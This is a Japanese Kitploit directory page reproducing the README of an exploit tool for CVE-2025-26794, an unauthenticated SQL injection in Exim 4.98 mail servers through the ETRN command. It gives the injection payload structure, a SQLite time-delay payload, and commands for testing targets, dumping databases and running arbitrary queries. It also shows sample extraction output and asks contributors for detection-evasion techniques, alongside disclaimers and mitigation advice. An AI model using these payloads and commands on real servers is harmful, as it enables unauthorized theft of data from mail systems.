Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-26794-exploit — Exim 4.98 の CVE-2025-26794 に対する SQL インジェクションのエクスプロイト。時間ベースのブラインド SQLi による自動データ抽出。認可されたペネトレーションテストのみを対象としています。 | Kitploit
ツール/GitHubGitHub/xploitgh0st/cve-2025-26794-exploit
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテストデータベースセキュリティ
GitHubxploitgh0st/cve-2025-26794-exploit

CVE-2025-26794-exploit

Exim 4.98 の CVE-2025-26794 に対する SQL インジェクションのエクスプロイト。時間ベースのブラインド SQLi による自動データ抽出。認可されたペネトレーションテストのみを対象としています。

リポジトリを見る
2410ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-26794: Exim ETRN SQLインジェクションエクスプロイト

Python Version License Status

CVE-2025-26794の概念実証エクスプロイトツール。SQLite DBMストレージ使用時にETRNコマンド経由でExim 4.98メールサーバーに存在するSQLインジェクションの脆弱性を示します。

⚠️ 法的免責事項

認可されたセキュリティテスト専用

このツールは、教育目的および認可されたペネトレーションテスト専用に提供されています。許可なくコンピュータシステムにアクセスすることは、以下の法律を含むさまざまな法律で違法となります:

  • 米国のComputer Fraud and Abuse Act(CFAA)
  • 英国のComputer Misuse Act
  • その他の法域における類似の法律

自分が所有していないシステムをテストする前に、明示的な書面による許可が必要です。

作者および貢献者は、このツールの誤用または損害について一切の責任を負いません。

📋 脆弱性の概要

CVE-2025-26794 はExim 4.98のSQLインジェクション脆弱性であり、以下の場合に発生します:

  • EximがSQLite DBMストレージで構成されている
  • ETRNコマンドハンドラがシリアライズデータを処理する
  • SQLクエリ構築前にユーザー制御入力のサニタイズが不十分

この脆弱性により攻撃者は以下が可能になります:

  • メールサーバーデータベースから機密データを抽出
  • 時間ベースのブラインドSQLインジェクション攻撃を実行
  • データベース構造(テーブル、列、データ)を列挙

影響を受けるバージョン

  • SQLite DBM構成のExim 4.98
  • 攻撃ベクトル

    • ネットワークアクセス可能なSMTPサービス(通常ポート25)
    • 認証不要(認証前にETRNコマンドが利用可能)

    🚀 機能

    • 脆弱性テスト: ターゲットが脆弱かどうかを確認する自動チェック
    • 時間ベースのブラインドSQLi: データ抽出にSQLiteの時間遅延テクニックを使用
    • 二分探索の最適化: 文字単位の効率的な抽出
    • 自動データベースダンプ: テーブル、列、サンプルデータを抽出
    • 対話モード: カスタムSQLクエリを対話的に実行
    • マルチモード運用: 柔軟な抽出戦略

    📦 インストール

    要件

    • Python 3.6以上
    • ターゲットSMTPサーバーへのネットワークアクセス

    セットアップ

    root@kitploit:~
    # Clone the repository
    git clone https://github.com/XploitGh0st/CVE-2025-26794-exploit.git
    cd CVE-2025-26794-exploit
    
    # Install dependencies (none required - uses standard library only)
    pip install -r requirements.txt
    
    # Make script executable (Linux/Mac)
    chmod +x exploit.py
    

    💻 使用方法

    基本構文

    root@kitploit:~
    python3 exploit.py <target> [options]
    

    クイック例

    1. ターゲットが脆弱かテスト

    root@kitploit:~
    python3 exploit.py 192.168.1.10 --test-only
    

    2. 自動データベースダンプ

    root@kitploit:~
    python3 exploit.py mail.example.com --auto-dump
    

    3. 対話的SQLクエリモード

    root@kitploit:~
    python3 exploit.py 10.0.0.5 --interactive
    

    4. 特定のテーブル構造を抽出

    root@kitploit:~
    python3 exploit.py 192.168.1.10 --table users --columns
    

    5. カスタムSQLクエリを実行

    root@kitploit:~
    python3 exploit.py 192.168.1.10 --query "SELECT sqlite_version()"
    

    コマンドラインオプション

    オプション説明
    hostターゲットのホスト名またはIPアドレス(必須)
    -p, --portSMTPポート(デフォルト: 25)
    -t, --timeoutソケットタイムアウト(秒)(デフォルト: 30)
    --threshold検出のための時間遅延しきい値(デフォルト: 0.8秒)
    --test-only脆弱性のテストのみ、データ抽出は行わない
    --auto-dumpデータベース構造とデータを自動的にダンプ
    --interactive対話型SQLクエリコンソールを起動
    --table TABLE抽出対象の特定テーブル
    --columns列名を抽出(--tableと併用)
    --query QUERYカスタムSQLクエリを実行

    🔍 動作の仕組み

    攻撃フロー

    1. 接続: ターゲットサーバーへのSMTP接続を確立
    2. ベースライン測定: 通常のETRNコマンドを送信して応答時間を測定
    3. インジェクションテスト: 時間遅延SQLペイロードを送信して脆弱性を確認
    4. データ抽出: 二分探索と時間ベースのブラインドSQLiを使用して文字ごとにデータを抽出

    SQLインジェクションペイロード構造

    root@kitploit:~
    ETRN #',1); <MALICIOUS_QUERY> /*
    

    このペイロードはETRNシリアライズハンドラの不適切なサニタイズを悪用し、SQLiteクエリへのSQLインジェクションを可能にします。

    時間ベースの検出

    SQLite固有の時間遅延を使用:

    root@kitploit:~
    SELECT 1 FROM tbl WHERE 1234=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
    

    条件が真の場合、測定可能な遅延(約1〜2秒)が発生します。

    📊 出力例

    root@kitploit:~
    ╔═══════════════════════════════════════════════════════════╗
    ║     CVE-2025-26794: Exim SQLi Data Extraction Tool        ║
    ║                  FOR AUTHORIZED USE ONLY                  ║
    ╚═══════════════════════════════════════════════════════════╝
    
    [*] Testing vulnerability...
    [+] Normal response time: 0.123s
    [+] Delayed response time: 1.456s
    [!!!] VULNERABLE - Time difference: 1.333s
    
    [*] Extracting table names...
    [*] Extracting table 1...
    [+] Extracted: users
    [+] Found table: users
    
    [*] Extracting columns from table 'users'...
    [+] Found column: id
    [+] Found column: username
    [+] Found column: email
    

    🛡️ 緩和策

    SQLite DBMを使用してExim 4.98を実行している場合:

    1. Eximを更新: パッチ適用済みバージョン(4.98.1以降)にアップグレード
    2. 入力検証: 厳格なETRNコマンド検証を実装
    3. パラメータ化クエリ: すべてのデータベース操作にプリペアドステートメントを使用
    4. ファイアウォールルール: SMTPアクセスを信頼できるネットワークに制限
    5. ETRNを無効化: 不要な場合はExim構成でETRNコマンドを無効化

    🔧 技術詳細

    二分探索アルゴリズム

    エクスプロイトは二分探索を使用して効率的に文字を抽出します:

    • ASCII表示可能範囲: 32〜126
    • 文字あたりの平均クエリ数: 約7(log₂ 94)
    • ネットワークトラフィックを最小限に最適化

    使用されるSQLite関数

    • unicode(): 文字のASCII値を取得
    • substr(): 結果から部分文字列を抽出
    • sqlite_master: スキーマ列挙用のシステムテーブル
    • pragma_table_info(): 列メタデータの抽出

    📚 参考情報

    • CVE詳細: CVE-2025-26794
    • Eximセキュリティアドバイザリ: [公式Eximアドバイザリ]
    • OWASP SQLインジェクション: OWASPガイド

    🤝 貢献

    以下の分野での貢献を歓迎します:

    • パフォーマンス最適化
    • 追加の抽出テクニック
    • 検出回避方法
    • バグ修正と改善

    すべての貢献には以下を含めてください:

    • 明確なドキュメント
    • 責任ある開示ガイドライン
    • 法的使用に関する警告

    📝 ライセンス

    このプロジェクトは教育目的のみで公開されています。責任を持って合法的に使用してください。

    👤 作者

    XploitGh0st

    • GitHub: @XploitGh0st

    🙏 謝辞

    • 責任ある脆弱性対応をしたExim開発チーム
    • セキュリティ研究コミュニティ
    • SQLite時間ベースインジェクション技術の研究者

    ⚖️ 責任ある開示

    このツールを使用して脆弱性を発見した場合:

    1. 詳細を直ちに公開しない
    2. ベンダー/メンテナーに非公開で連絡する
    3. パッチ適用に十分な時間を与える(通常90日)
    4. 協調的な開示ガイドラインに従う

    忘れないでください:大きな力には大きな責任が伴います。このツールを倫理的かつ合法的に使用してください。

    ツールをダウンロード